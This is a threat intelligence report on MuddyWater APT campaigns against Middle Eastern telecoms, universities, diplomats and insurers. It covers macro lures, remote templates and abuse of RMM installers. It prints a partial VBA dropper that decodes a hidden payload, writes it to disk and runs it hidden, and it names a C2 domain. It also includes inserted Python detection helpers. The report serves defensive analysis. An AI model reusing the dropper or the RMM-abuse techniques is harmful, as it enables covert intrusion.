TL;DR
◈ Key Findings
- The Middle East serves as a strategic cyber threat hub where state-sponsored APT activities are highly concentrated.
- Attacks originating from the Middle East prioritized long-term infiltration and intelligence collection over short-term gains.
- Abuse of RMM tools and macro-based attacks were primary initial access vectors used by Middle Eastern APT groups.
- User-driven attacks leveraging social engineering techniques and outdated environments continued to be actively employed.
- Perimeter-based detection has clear limitations, making endpoint behavior-based EDR essential.
1. Overview
The Middle East is a region of high strategic importance from geopolitical, military, and energy security perspectives, where a significant volume of state-sponsored cyber threat activities has been observed. Due to these characteristics, persistent intrusion-focused cyber operations (APT) conducted for state-level intelligence collection and the execution of diplomatic and security strategies have been actively carried out. These activities have not been confined to the Middle East, but have shown a pattern of expansion across Europe, Asia, and North America.
Cybersecurity threats originating from the Middle East have been analyzed as prioritizing long-term persistence, information theft, and influence expansion over one-off attacks or direct financial gain. Attack targets are primarily concentrated in sectors critical to national functions, such as government agencies, diplomatic and defense organizations, and energy and telecommunications infrastructure.
Cybersecurity authorities in multiple countries, including the United States and the United Kingdom, have highlighted that Middle East-based threat actors continued to rely on document-based spear-phishing as an initial access method.
Recent versions of Microsoft Office block macro execution by default for documents downloaded from the internet or apply enhanced security protections. However, attackers combined email content with social engineering techniques to persuade users to explicitly enable macros. In environments where legacy software remained widely deployed, automatic macro execution was still enabled, resulting in a relatively high success rate.
In addition, document-based threats that abuse OLE and embedded object features to conceal payloads remain a commonly used attack vector worldwide. When such environments are combined with well-crafted phishing messages, document-based initial access techniques that rely on user interaction continue to be considered an effective attack method.
Against this backdrop, this threat intelligence report aims to analyze the current landscape of state-sponsored cyber threats operating primarily in the Middle East and to systematically outline the key tactics and technical characteristics observed in real-world attacks.
This report aims to provide an objective view of the current landscape of Middle East–based cyber threats by focusing on recently observed attack flows, including spear-phishing–based initial access, user deception through malicious documents, and post-compromise techniques for persistence and evasion.
In such a threat environment, traditional perimeter security and signature-based detection approaches are assessed as having inherent limitations in effectively identifying and blocking attacks across their full lifecycle. Accordingly, this report also examines the necessity of adopting Endpoint Detection and Response (EDR) from the perspective of behavior-based detection and post-compromise visibility.
EDR is recognized as an effective countermeasure for continuously collecting and analyzing anomalous endpoint behaviors. It enables the detection of techniques repeatedly leveraged in Middle East–based APT attacks following initial compromise, such as lateral movement, script execution, and memory-based malicious activity.
Ultimately, this report aims to enhance understanding of the tactics and technical evolution of Middle East cyber threats and, based on this analysis, to derive practical technical and operational insights for strengthening organizational detection and response capabilities.
2. Background
State-sponsored cyber threat groups operating in the Middle East are generally known to have structural ties to intelligence agencies or quasi-governmental organizations. While these groups outwardly present themselves as independent hacking collectives, numerous cases have confirmed that they are in fact leveraged as operational entities for intelligence collection and the execution of cyber operations aligned with national strategic objectives.
The names used to refer to threat groups within the international security community are typically not official designations adopted by the actors themselves. Instead, they commonly originate from classification labels assigned by security analysts based on factors observed during initial compromise analysis, including attack infrastructure, malicious tools, campaign characteristics, and internal identifiers. These names serve as practical identifiers for systematically distinguishing and analyzing threat actor activities.
The designation "MuddyWater" was first used in November 2017 in the Palo Alto Networks Unit 42 report titled "Muddying the Water: Targeted Attacks in the Middle East," during the process of identifying and classifying a series of targeted attacks against the Middle East.
Since then, the name was widely adopted by multiple security vendors and national cybersecurity authorities in threat intelligence (TI) analysis reports as the term used to refer to the same threat actor.
Based on technical analysis findings, the threat actor is assessed to be affiliated with Iran’s Ministry of Intelligence and Security (MOIS). This assessment cited multiple factors, including the geographic and political characteristics of the targets, attack infrastructure repeatedly reused over extended periods, operational patterns concentrated within specific time windows, and tactics, techniques, and procedures (TTPs) that overlapped with Iran-based threat actors. This assessment is not based on a single indicator but is derived from a comprehensive synthesis of multi-year campaign tracking and infrastructure correlation analysis.
The name "Muddy Water" can be interpreted as a symbolic reference to operational characteristics intended to deliberately obscure the attack chain and attribution. However, such labels are convenience identifiers for analysis and classification. The substantive nature of the threat lay not in a specific group name, but in persistent, systematic, state-directed cyber operational capabilities and operating methods.
Looking at the overall attack patterns of Middle East–origin cyber threats, spear-phishing emails were most frequently used during the initial access stage. In this process, malicious files delivered via Office documents, including Microsoft Word documents, had been used as a primary delivery mechanism since the initial reporting in 2017, and were observed to be used alongside various formats such as Excel macro-enabled documents.
These documents were typically disguised as legitimate business materials or official notices to prompt users to enable content or run macros, which then installed additional malicious payloads.
Post-compromise, threat actors employed a range of tactics, techniques, and procedures (TTPs), including PowerShell-based script execution, DLL side-loading, and the abuse of legitimate remote management tools. These techniques enabled long-term access persistence within the network and evasion of security detection.
In addition, some recent attack cases showed indications of malware written in Rust, suggesting that state-sponsored threat actors in the Middle East continued to advance their malware development and operational capabilities.
Putting these observations together, Middle East cyber threats should be understood not as an issue limited to a single group or isolated campaign, but as a threat ecosystem accumulated and operated over the long term at the level of national strategy. Accordingly, rather than responding on a case-by-case basis, organizations need to analyze threats around commonalities in attack methods and the direction of technical evolution, and to establish proactive detection and response strategies based on those insights.
3. Chronology of MuddyWater APT Attacks
3-1. Case: Attack on Iraqi Telecommunications Infrastructure
To more accurately understand recent threat trends, it is necessary to first review past APT attack cases conducted against telecommunications providers in the Middle East. Reviewing these prior cases provides important background for understanding the strategic objectives pursued by threat actors over an extended period and the evolution of their tactical approaches.
A notable example is a targeted attack against an Iraqi mobile network operator, detected on March 11, 2019. The attack targeted an operator running major telecommunications infrastructure in Iraq and was assessed as aiming to maintain long-term intrusion after obtaining initial access to the internal user environment.
[Figure 3-1] Spear-Phishing Attack Case Targeting an Iraqi Mobile Network Operator
The operator provided mobile telecommunications services across Iraq and had a diverse user base, including enterprises, government agencies, and individual customers. Although its business structure and service coverage later changed due to financial and regulatory issues, at the time it was regarded as one of the key operators supporting the national telecommunications backbone. These attributes made it a high-value strategic target for external threat actors.
In the initial stage of the attack, a typical spear-phishing–based intrusion technique was used. Analysis indicated that the threat actor emailed a Microsoft Word file disguised as a work-related document to a specific internal user, prompting the recipient to open the document and enable macro execution. In this process, the lure document inserted a blurred image to trick the user into activating macros, and after the macro executed, it displayed a fake error message, which was designed to minimize user suspicion.
[Figure 3-2] Prompt to Enable Malicious Macros in a DOC Document
The malicious macro embedded in the document, immediately upon execution, invoked additional malicious logic and performed deobfuscation. In the final stage, it was structured to launch a backdoor via PowerShell.
This PowerShell-based backdoor communicated with a C2 server and provided capabilities such as remote command execution, additional payload download, and control of the infected system, enabling the attacker to maintain persistent control over the internal environment. This attack flow showed characteristics consistent with the tactics, techniques, and procedures (TTPs) repeatedly used by the threat actor. In particular, the use of PowerShell masquerading as a legitimate administrative tool served as an effective means of evading detection and establishing a stealthy, long-term foothold.
This case was not limited to a single, isolated attack against one telecommunications operator, but served as an important reference for understanding a broader series of activities that persistently targeted telecommunications, energy, and government-related organizations across the Middle East. In particular, considering the customer data, network operations data, and connections with government agencies held by telecommunications providers, these activities were likely conducted to support strategic intelligence collection and long-term influence, rather than simple information theft.
Such historical cases carried significant value as a baseline for analyzing later campaigns, enabling analysts to compare and contrast the adversary’s approach to objective setting, initial access strategy, and the end-to-end flow of malware use.
3-2. Case: Attack Targeting a University in Jordan
The second case was a sophisticated spear-phishing attack carried out on April 8, 2019, against a member of a university in Jordan. The attack targeted the university and impersonated a trusted government agency, with socially engineered initial access attempts serving as its core component.
The attacker sent an email impersonating the Jordanian government agency "Civil Status and Passport Department (cspd.gov.jo)". The email subject line was "Students Migration Verification - Civil Status and Passport Department". This was a spoofing technique intended to lead the recipient to perceive the message as an official administrative request sent by a legitimate government institution.
[Figure 3-3] Spear-Phishing Case Targeting a University in Jordan
The email body stated that, per a request from the CSPD, migration-related information for certain students needed to be verified, and asked the recipient to review the attached document and promptly inform the relevant students. This structure closely reflected the roles and responsibilities of university administrative staff and was a social engineering design intended to prompt the recipient to open the attachment without suspicion.
The attachment was a Microsoft Word document disguised as legitimate student-related content and contained malicious macro code. The document was configured to execute macros if the user enabled content, and after execution, it loaded additional malicious payloads or attempted to communicate with remote infrastructure controlled by the attacker.
In particular, the document was configured via OpenXML relationship definitions to reference an externally hosted template. It used the attachedTemplate relationship to load a template file from a remote URL controlled by the attacker. This external template was automatically loaded when the document was opened and could be used as an additional delivery path for malicious code either before or after macro execution. This is a typical document-based initial access method that leverages user action as the direct trigger and an indirect loading technique used to bypass security detection.
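One way to check a Word package for exactly this relationship is shown below; this is an added example for analysts, not code from the report, and the minimal packages it builds are constructed skeletons (no real document content) with a placeholder template URL.

```python
# Added example: flag Word documents whose settings relationships pull an attachedTemplate
# from a remote location. The sample packages built below are constructed minimal skeletons.
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate")
# attachedTemplate is declared in word/settings.xml, so its relationship lives here.
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def classify_target(target: str) -> str:
    """'remote' for http(s) URLs, 'network' for UNC/file-server paths, else 'local'."""
    parts = urlsplit(target)
    if parts.scheme in ("http", "https"):
        return "remote"
    if (parts.scheme == "file" and parts.netloc) or target.startswith("\\\\"):
        return "network"
    return "local"


def attached_templates(docx_bytes: bytes):
    """Return (target, class) for every external attachedTemplate relationship in the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return found
        root = ET.fromstring(zf.read(SETTINGS_RELS))
        for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
            if rel.get("Type") != ATTACHED_TEMPLATE_TYPE:
                continue
            if rel.get("TargetMode", "Internal") != "External":
                continue
            target = rel.get("Target", "")
            found.append((target, classify_target(target)))
    return found


def remote_template_targets(docx_bytes: bytes):
    """Targets that would make Word fetch a template over the network when the file opens."""
    return [t for t, cls in attached_templates(docx_bytes) if cls in ("remote", "network")]


def build_sample_docx(template_target=None) -> bytes:
    """Constructed minimal .docx skeleton: enough for the detector, not a full Word file."""
    settings = ('<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                '<w:attachedTemplate r:id="rId1"/></w:settings>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/settings.xml", settings)
        if template_target is not None:
            zf.writestr(SETTINGS_RELS,
                        f'<Relationships xmlns="{PKG_REL_NS}"><Relationship Id="rId1" '
                        f'Type="{ATTACHED_TEMPLATE_TYPE}" Target="{template_target}" '
                        'TargetMode="External"/></Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder URL; a real lure would point at attacker-controlled infrastructure.
    suspicious = build_sample_docx("http://template.example.invalid/seminar.dotm")
    print(remote_template_targets(suspicious))
    normal = build_sample_docx("file:///C:/Users/u/AppData/Roaming/Microsoft/Templates/Normal.dotm")
    print(remote_template_targets(normal))  # a local Normal.dotm is not reported
```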
[Figure 3-4] Prompt to Enable Malicious Macros in a DOC Document
The VBA script embedded in the malicious document served to invoke PowerShell commands, and was designed to enable follow-on actions such as backdoor installation, collection of information from the infected system, and remote command execution. The external template invocation technique made static analysis of the document itself more difficult and, by separating the actual malicious logic into remote resources, enabled flexible replacement of attack infrastructure and modification of payloads. This attack flow combined document-based social engineering, external template loading, and script execution, and was designed with multi-stage intrusion in mind.
The attacker selected an educational institution to gain broader network access rather than simply infecting an individual user. Educational institutions such as universities often have direct or indirect ties to government departments, research organizations, and public projects, which can provide access to additional information assets and follow-on intrusion paths. Accordingly, this attack reflected a strategic focus on mid- to long-term intelligence collection and internal foothold establishment, rather than short-term malware distribution.
In addition, the attack flow observed in this case was structured to account for post-compromise persistence and potential expansion. Follow-on command execution via PowerShell, potential communication with remote control infrastructure, and the possibility of installing additional tools were assessed as characteristics designed to enable the attacker to observe and control the internal environment over an extended period.
Overall, this case is a representative example of an advanced spear-phishing attack that abused the trust of educational institution members through emails impersonating a government agency and attempted internal intrusion triggered by the execution of a malicious document. It shows that email-based attacks remained an effective initial access vector in targeted attacks, and suggests that messages disguised as administrative or official requests could have a high likelihood of success within organizations.
3-3. Case: Attacks Targeting Egypt’s Hosting Services, Israel’s Insurance, and Malaysia’s Pension Sector
The spear-phishing cases discussed earlier primarily relied on malicious MS Word documents. However, between Q4 2022 and Q2 2023, a shift in attack techniques was observed, with attackers using malicious HTML files or embedding Dropbox URLs.
The HTML file used in this attack, when opened, prompted additional user actions through an embedded URL and ultimately redirected the recipient to a Microsoft OneDrive address. The recipient was then led to download a malicious ZIP archive.
During this process, the threat actor used legitimate cloud storage services such as Dropbox and OneDrive as an intermediate delivery path to bypass security solutions and user vigilance.
This technique abused trusted service domains to evade URL reputation-based detection and to increase credibility through social engineering.
[Figure 3-5] Spear-Phishing Case Using an HTML Attachment and Embedded URL Links
In October 2022, the attacker conducted a spear-phishing attack targeting an Egypt-based data hosting and IT infrastructure service provider, disguising the email as an inquiry about hosting services. Analysis indicated that the attacker used a format similar to a legitimate customer inquiry as a social engineering technique to lower the recipient’s vigilance.
In November 2022, the attacker simultaneously targeted three Israel-based insurance companies, showing a campaign-style pattern aimed at the broader insurance industry rather than a single organization. This was assessed as an attempt to expand the scope of attacks by consecutively targeting multiple organizations within the same sector.
In April 2023, an attack targeting an individual affiliated with a Malaysian government-run public pension fund management institution was also identified.
Notably, the malicious HTML attachment used in this attack was the same file used in the November 2022 attacks against Israel’s insurance industry.
This confirmed that the threat actor reused the malicious file and conducted sustained attack activity over several months, with professionals in the insurance and pension sectors as primary targets.
[Figure 3-6] Malicious HTML Execution Screen
When the HTML file was opened, it displayed a page that looked like a download page from the official website of a major hotel chain headquartered in Tel Aviv, Israel.
However, this was not a legitimate page. Instead, it led to a link that redirected to OneDrive and ultimately prompted the download of a malicious ZIP archive named "Looking for business insurance no335080.2022-isrotel.zip".
[Figure 3-7] Downloaded ZIP Archive and the MSI File Contained Within
The file "Looking for business insurance no335080.2022-isrotel.msi" contained inside was a Syncro MSI installer.
Syncro is a legitimate RMM (Remote Monitoring and Management) based IT management platform provided by Servably, a US-based company. It is primarily used by MSPs (Managed Service Providers) and in-house IT operations teams to remotely manage IT assets within an organization.
The solution offers a trial version with few functional limitations for a certain period, and the program itself is not malicious. Syncro identifies managed endpoints through a customized MSI agent that includes a customer ID, and systems with the agent installed are centrally controlled through a web-based management console.
This enables various administrative functions, including remote command execution and status monitoring.
[Figure 3-8] Screen Showing Customer API Key and ID Values
[Figure 3-9] Internal Commands Used to Check Key Values
In particular, systems with the agent installed enabled powerful administrative capabilities, including a SYSTEM-level remote terminal, remote desktop access, full file system control, and task and service management. These capabilities were useful in legitimate operational environments, but posed a significant security risk if abused.
A key issue was that these capabilities were distributed in the form of a properly signed MSI installer file. Threat actors could exploit this by generating a legitimate Syncro agent MSI file and distributing it as an email attachment or download link in spear-phishing messages, using it as an initial access vector. If the agent was successfully installed, attackers could obtain persistent remote access without deploying additional malware.
Attackers could then use this access to conduct internal reconnaissance and proceed with follow-on actions in stages, such as deploying additional payloads, exfiltrating data, and sharing access with others. When legitimate management tools are abused in this way, the activity can blend in with normal administrative traffic, increasing the likelihood of evading detection and raising the risk of prolonged compromise.
3-4. Case: Attack Targeting a University in Israel
In April 2024, a malicious file distribution attack targeting a university in Israel was identified. A total of 27 university email accounts, believed to belong to faculty and students, were specified as recipients.
The email used in this attack was sent from an official email account of another university in Israel, rather than from the university that received the email.
The threat actor simultaneously addressed multiple individual accounts using the recipient university’s official email domain and delivered a malicious file. This indicated a targeted campaign aimed specifically at members of a particular educational institution, rather than indiscriminate distribution to an undefined audience.
[Figure 3-10] Attack Targeting a Specific University in Israel
The email attachment included an encrypted archive named "digitalform.rar", protected with the password "123456". The password was provided in the email body, prompting the recipient to extract the archive without additional verification.
Using an encrypted archive in this way is a common evasion technique aimed at bypassing email security solutions that rely on static inspection of archived contents or on detecting and blocking malicious files.
Inside the archive was a Windows Installer package named "digitalform.msi", whose digital signature listed Atera Networks.
Atera Networks is a legitimate global management software company headquartered in Israel that provides an RMM-based remote management platform for MSPs and in-house IT departments. The platform is originally used for system administration and operational efficiency.
As noted earlier, the threat actor abused legitimate IT management tools such as Syncro and Atera as initial access vectors. By distributing properly signed installer files, the attacker attempted to evade detection by security solutions and to obtain persistent remote access to target systems without executing separate malware.
This approach warranted caution because it was nearly indistinguishable from normal administrative traffic and could conceal the compromise for an extended period.
In addition to Syncro and Atera, the threat actor was also reported to have used various remote management tools in attacks, including Remote Utilities, ScreenConnect, SimpleHelp, and N-Able.
[Figure 3-11] Properties of the "digitalform.msi" File

During installation, the "digitalform.msi" installer communicated with the Atera remote management endpoint using the embedded account information and identifier (ID).
[Figure 3-12] Atera Identifier Information
Once the installation was complete, the threat actor could use Atera RMM’s legitimate features to perform various remote administration tasks on the affected system, including command execution, file upload and download, and system monitoring.
In addition, the installer could be used to set up an environment capable of launching third-party remote control tools, as listed below.
- Splashtop (Free)
- AnyDesk (Free)
- TeamViewer
- ScreenConnect
[Figure 3-13] Atera Device Management Screen
In this way, the MuddyWater APT group registered for legitimate RMM services through normal procedures and then used the agent modules provided by those platforms during the initial access stage.
Instead of distributing custom malware, they delivered properly signed RMM installer packages via phishing email attachments or download links, prompting victims to install them. The agent communicated with official RMM infrastructure and enrolled the endpoint into the remote management environment, allowing the attacker to obtain persistent remote access without executing additional payloads.
Because the network traffic and process activity generated through this method followed the same patterns as legitimate IT administration, it was effective at bypassing traditional signature-based detection. After gaining initial access, the attacker could use RMM functionality to perform follow-on actions in stages, including deploying additional tools, executing commands, collecting information, and conducting lateral movement.
This approach reduced the cost of maintaining attack infrastructure while significantly delaying detection and increasing the difficulty of analysis by disguising malicious activity as normal administrative operations.
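Because the agent itself is legitimate, detection has to come from context rather than signatures. The added example below (not code from the report) correlates a user-context msiexec launch with a following RMM agent install on the same host; the event records are constructed, the product and manufacturer strings are illustrative rather than the vendors' real installer metadata, and the approved-tool set is an assumption.

```python
# Added example: correlate user-context msiexec launches with RMM agent installs.
# Event records below are constructed; product/manufacturer strings are illustrative, not
# the vendors' real installer metadata, and the approved-tool set is an assumption.
from datetime import datetime, timedelta

# RMM products named in the report, matched case-insensitively as substrings.
RMM_KEYWORDS = ("syncro", "atera", "splashtop", "anydesk", "teamviewer",
                "screenconnect", "simplehelp", "n-able", "remote utilities")
APPROVED_RMM = {"splashtop"}  # assumption: the only RMM the organisation sanctions
# Parents that mean a person launched the installer (mail client, Office, browser, shell, archiver).
USER_FACING_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "explorer.exe",
                       "chrome.exe", "msedge.exe", "firefox.exe", "7zfm.exe", "winrar.exe"}
USER_PATH_HINTS = ("\\downloads\\", "\\temp\\", "\\inetcache\\")
WINDOW = timedelta(minutes=10)


def rmm_name(text: str):
    low = text.lower()
    return next((kw for kw in RMM_KEYWORDS if kw in low), None)


def user_driven_msiexec(ev: dict) -> bool:
    """True for a process-create record where msiexec.exe came from a user-facing parent
    or installs a package from a download/temp location."""
    if ev["type"] != "process" or not ev["image"].lower().endswith("msiexec.exe"):
        return False
    parent = ev["parent"].lower().rsplit("\\", 1)[-1]
    cmd = ev["cmdline"].lower()
    return parent in USER_FACING_PARENTS or any(h in cmd for h in USER_PATH_HINTS)


def detect_rmm_installs(events):
    """One alert per RMM install that is unapproved and/or preceded (same host, within
    10 minutes) by a user-driven msiexec launch. Severity is high for unapproved tools."""
    launches = [e for e in events if user_driven_msiexec(e)]
    alerts = []
    for ev in events:
        if ev["type"] != "msi_install":
            continue
        tool = rmm_name(ev["product"] + " " + ev["manufacturer"])
        if tool is None:
            continue
        reasons = []
        if tool not in APPROVED_RMM:
            reasons.append("RMM product not in approved set")
        t = datetime.fromisoformat(ev["ts"])
        for launch in launches:
            delta = t - datetime.fromisoformat(launch["ts"])
            if launch["host"] == ev["host"] and timedelta(0) <= delta <= WINDOW:
                reasons.append("user-context msiexec launch: " + launch["cmdline"])
                break
        if reasons:
            alerts.append({"host": ev["host"], "user": ev["user"], "tool": tool,
                           "severity": "high" if tool not in APPROVED_RMM else "medium",
                           "reasons": reasons})
    return alerts


SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"ts": "2024-04-10T09:02:11", "host": "WS-17", "type": "process", "user": "alice",
     "image": "C:\\Windows\\System32\\msiexec.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmdline": 'msiexec.exe /i "C:\\Users\\alice\\Downloads\\digitalform.msi"'},
    {"ts": "2024-04-10T09:02:40", "host": "WS-17", "type": "msi_install", "user": "alice",
     "product": "Atera Agent", "manufacturer": "Atera Networks"},
    {"ts": "2024-04-10T11:30:00", "host": "WS-03", "type": "process", "user": "SYSTEM",
     "image": "C:\\Windows\\System32\\msiexec.exe", "parent": "C:\\deploy\\agent.exe",
     "cmdline": 'msiexec.exe /i "C:\\deploy\\cache\\splashtop.msi" /qn'},
    {"ts": "2024-04-10T11:30:25", "host": "WS-03", "type": "msi_install", "user": "SYSTEM",
     "product": "Splashtop Streamer", "manufacturer": "Splashtop"},
    {"ts": "2024-04-10T12:00:00", "host": "WS-17", "type": "msi_install", "user": "alice",
     "product": "Example Archiver", "manufacturer": "Example Corp"},
]

if __name__ == "__main__":
    for alert in detect_rmm_installs(SAMPLE_EVENTS):
        print(alert)
```

Only the WS-17 install fires: Atera is outside the approved set and the package was launched from the user's Downloads folder under explorer.exe, while the sanctioned Splashtop rollout on WS-03 via a deployment agent stays silent.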
3-5. Case: Attack Impersonating an Omani Diplomatic Institution, Targeting Multiple Foreign Ministries and International Organizations
The spear-phishing attempt identified on August 19, 2025 appeared to be a targeted phishing email that used an attachment disguised as an official event invitation from an Omani diplomatic institution.
[Figure 3-14] Attack Screen Disguised as an Event Invitation from an Omani Diplomatic Institution
The email was a mass spear-phishing message sent to hundreds of recipients, not a single organization, including foreign ministries, resident embassies, and accounts associated with UN-affiliated international organizations across Europe, the Middle East, Africa, Asia, and the Americas. The subject line was "official invitation", using a phrase commonly used in formal correspondence between diplomatic missions to lower the recipient’s vigilance.
The message omitted specific event details from the subject line and instead prompted the recipient to review the email body and attachment, a pattern repeatedly observed in spear-phishing attacks.
The sender address used the official domain of Oman’s Ministry of Foreign Affairs and used an account name suggestive of the Omani Embassy in Paris, France, designed to be perceived as a legitimate diplomatic account.
This was a social engineering technique intended to increase credibility through domain recognition and to prompt recipients to mistake the message for official diplomatic communication.
The email body was written in the form of an invitation to an international seminar hosted by Oman’s Ministry of Foreign Affairs and presented a timely international issue, such as the "Iran–Israel War", to align directly with the professional interests of diplomats and international organization staff.
The attachment was delivered as a Word document named "Online Seminar.FM.gov.om.doc". It used a file type commonly associated with diplomatic correspondence, suggesting that the attacker likely attempted initial access via macro execution or exploitation of document vulnerabilities.
When the document was opened, it first displayed a lure page disguised as a legitimate diplomatic document.
At the top of the document, a banner image featuring the Omani flag and the text "Foreign Ministry of Oman" was placed, serving as a visual element that mimicked the format of official Omani Ministry of Foreign Affairs documents.
This layout increased the document’s credibility and prompted users to review the content without suspicion.
[Figure 3-15] Malicious DOC Document When Opened
In the center of the document, the phrase "Attention! Word needs Enable Content" was displayed prominently.
This message was a social engineering prompt designed to make the user feel that enabling content (activating macros) was necessary to view the document properly.
Below it, phrases such as "Online Seminar", a specific date, and diplomatic and security-related topics tied to the Middle East situation were arranged, but the actual content was blurred so that the user could not fully read the document.
As a result, the user was led to believe that macro execution was required to view the document contents.
When the user clicked the "Enable Content" button at the top, the VBA macro embedded in the document executed immediately.
The macro was bound to the Word document’s Document_Open() event, so the execution flow started automatically as soon as macros were enabled. No additional user input or clicks were required.
For reference, the VBA macro below is a partial excerpt; unused or meaningless variables have been removed, which does not affect the main execution logic.
' Decode: 3-digit ASCII numbers to characters
Function dddd(str As String) As String
    Dim out As String
    For counter = 1 To Len(str) Step 3
        out = out & Chr(Val(Mid(str, counter, 3)))
    Next
    dddd = out
End Function

' Execute: run the file path via Shell
Function RRRR(path As String)
    On Error GoTo erorr2
    Dim command As String
    Dim windowStyle As Integer
    Dim errorCode As Variant
    command = path
    windowStyle = vbHide
    errorCode = Shell(command, windowStyle)
    If errorCode <> 0 Then
    End If
erorr2:
    ' n
End Function

' Auto-run: on document open → decode → write file → execute
Private Sub Document_Open()
    On Error GoTo AAAA
    Dim pth As String
    Dim app As String
    Dim fileNumber
    pth = "C:\\Users\\Public\\Documents\\ManagerProc.log"
    app = dddd(UserForm1.TextBox1.Text)
    fileNumber = FreeFile
    Open pth For Output As fileNumber
    Print #fileNumber, app
    Close fileNumber
    RRRR (pth)
AAAA:
    ' n
End Sub
[Table 3-1] Partial View of the VBA Macro
Upon macro execution, the malicious document reconstructs a malicious payload hidden within it.
Rather than embedding an executable directly in the VBA code, the document stores encoded data as a numeric string inside a TextBox control of a UserForm object (UserForm1).
The numeric string is composed of three-digit segments, where each value maps to a single ASCII byte ranging from 0 to 255.
The decoding process is handled by the dddd() function. This function reads the numeric string in three-digit chunks, converts each chunk to an integer, maps it to the corresponding ASCII character, and appends it sequentially to build the decoded string.
Through this process, the binary data of the executable is reconstructed. Once the entire string is decoded, a Windows executable (PE) is fully restored.
[Figure 3-16] Numeric String Decoding Screen
The "ManagerProc.log" file was a malicious file intended not to immediately steal information from the user system, but to identify characteristics of the compromised environment after initial access and to establish a persistent foothold through communication with a remote C2 server.
When executed, the file collects basic system information such as the username and computer name, determines whether the user has administrator privileges, encrypts the data, and sends it to the C2 server at "screenai[.]online".
This sequence of actions aligned with the typical behavior of a state-sponsored spyware loader, representing a reconnaissance stage conducted in preparation for follow-on malicious activity or the delivery of additional payloads.
3-6. Case: Attack Targeting an Israel-Based Company Providing IT Services
The final case in 2025 was confirmed to have been received at 5:13 PM on Monday, November 17, a time close to the end of a typical workday. This is assessed as a spear-phishing initial access attempt timed to exploit the period just before employees leave work, when security awareness and attention are more likely to be reduced due to end-of-day wrap-up activities.
The attacker used a Hebrew-language subject and body and a sender address using Israel’s country domain (“.co.il”), indicating that the primary targets were an Israel-based company providing IT services, security, and remote support, or users associated with such a company.
The email subject, "New company guidelines and regulations", was disguised as a notice related to internal policies and rules and included social engineering elements that emphasized authority and operational importance so that the recipient would perceive it as an official document requiring immediate review.
The email body followed a concise structure containing only minimal guidance and required the recipient to open only the attachment without external links, shortening the user’s decision-making process and naturally steering the recipient toward executing the malicious document.
[Figure 3-17] Attack Targeting an Israel-Based IT Service Provider
The threat actor provided the same malicious DOC document in two formats, as a direct attachment and as a ZIP archive, to bypass security product detection or increase the likelihood that the recipient would execute the file.
[Figure 3-18] "Webinar.doc" Execution Screen
The "Webinar.doc" document runs primarily through the Sub love_me_() routine in the ThisDocument module of its VBA project, which serves as the entry point for the macro execution chain.
It first retrieves the user profile path using Environ("USERPROFILE") and then builds the drop path as "%USERPROFILE%\Downloads\PhotoAcq.log".
The routine does not download the payload directly. Instead, it proceeds by reconstructing data hidden within the document.
The payload data is embedded as an ASCII hex string in the control data of UserForm1; the string is the hex encoding of a PE binary. At runtime, the VBA code reads the hex string and calls a binary conversion routine.
The conversion routine checks whether the length of the input hex string is even, converts each two-digit hex value into one byte, and writes the resulting binary to the "PhotoAcq.log" file.
After creating the file, it immediately transitions to the execution stage, connects to WMI, and uses the Win32_Process object to launch "PhotoAcq.log" as a process.
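As an added example (not code from the report or from either macro), the following Python helper decodes both UserForm encodings described above, the three-digit decimal chunks consumed by dddd() in the "ManagerProc.log" dropper and the two-digit hex string converted by "Webinar.doc", and checks that the result is a PE image before an analyst hands it to a sandbox or disassembler; the sample header bytes are constructed.

```python
"""
Added analyst helper; not code from the Genians report or from the macros it describes.
Decodes the two UserForm string encodings the report walks through (dddd()-style
three-digit decimal chunks and the Webinar.doc two-digit hex string) and checks
that a PE file came out. The sample PE header below is constructed.
"""
import re
import struct


def decode_decimal_triplets(s: str) -> bytes:
    """One byte per three-digit chunk, each chunk in 0..255 (dddd()-style decoding)."""
    s = re.sub(r"\s+", "", s)
    if not s.isdigit() or len(s) % 3:
        raise ValueError("expected decimal digits in groups of three")
    out = bytearray()
    for i in range(0, len(s), 3):
        v = int(s[i:i + 3])
        if v > 255:
            raise ValueError(f"chunk {s[i:i + 3]!r} at offset {i} exceeds 255")
        out.append(v)
    return bytes(out)


def decode_hex_pairs(s: str) -> bytes:
    """One byte per two hex digits; rejects odd lengths as the Webinar.doc routine does."""
    s = re.sub(r"\s+", "", s)
    if len(s) % 2:
        raise ValueError("hex string length must be even")
    return bytes.fromhex(s)


def is_pe(buf: bytes) -> bool:
    """MZ signature plus an e_lfanew that lands on 'PE\\0\\0'."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return buf[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_payload(userform_text: str):
    """
    Try both encodings on text pulled from a UserForm control and return
    (encoding_name, bytes) for the one that yields a PE image, else None.
    Decimal is tried first because a pure-digit string is also valid hex.
    """
    for name, fn in (("decimal-triplets", decode_decimal_triplets), ("hex", decode_hex_pairs)):
        try:
            data = fn(userform_text)
        except ValueError:
            continue
        if is_pe(data):
            return name, data
    return None


# Constructed sample: a bare PE header stub, not bytes from any real sample.
SAMPLE_PE = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40) + b"PE\0\0" + bytes(0x10)
SAMPLE_DECIMAL = "".join(f"{b:03d}" for b in SAMPLE_PE)   # "077090000..." as dddd() expects
SAMPLE_HEX = SAMPLE_PE.hex()                               # "4d5a0000..." as Webinar.doc stores it

if __name__ == "__main__":
    for text in (SAMPLE_DECIMAL, SAMPLE_HEX):
        name, data = recover_payload(text)
        print(f"{name}: recovered {len(data)} bytes, PE header valid")
```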
